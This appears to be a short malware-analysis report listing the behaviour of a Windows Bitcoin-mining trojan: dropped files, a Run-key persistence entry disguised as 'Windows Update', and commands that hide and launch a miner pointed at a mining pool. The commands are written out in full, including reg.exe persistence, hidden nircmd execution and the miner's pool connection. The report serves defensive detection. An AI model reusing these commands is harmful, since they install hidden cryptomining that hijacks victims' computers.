Техническая информация (Technical information)
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Windows Update' = '%WINDIR%\system\critical\antivirus.bat'
- '%WINDIR%\system\critical\system.exe' -o http://hi##########unheim:123@btcguild.com:8332 -g yes -I 100
- '<SYSTEM32>\nircmd.exe' exec hide system.exe -o http://hi##########unheim:123@btcguild.com:8332 -g yes -I 100
- '<SYSTEM32>\nircmd.exe' exec hide antivirus.bat
- '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Update" /t REG_SZ /d "%WINDIR%\system\critical\antivirus.bat" /f
- '<SYSTEM32>\cmd.exe' /c antivirus.bat
- '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\system\critical\sys.bat" "
- '<SYSTEM32>\attrib.exe' %WINDIR%\system\critical +h
- %WINDIR%\system\critical\phatk.ptx
- %WINDIR%\system\critical\phatk.cl
- %WINDIR%\system\critical\nircmd.exe
- %WINDIR%\system\critical\usft_ext.dll
- %WINDIR%\system\critical\system.exe
- %WINDIR%\system\critical\sys.bat
- %WINDIR%\system\critical\btc.il
- %WINDIR%\system\critical\btc-evergreen.il
- %WINDIR%\system\critical\antivirus.bat
- %WINDIR%\system\critical\miner.dll
- %WINDIR%\system\critical\guicomp.dll
- %WINDIR%\system\critical\coinutil.dll
- %WINDIR%\system\critical\nircmd.exe → <SYSTEM32>\nircmd.exe
- 'bt###ild.com':8332
- DNS ASK bt###ild.com
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''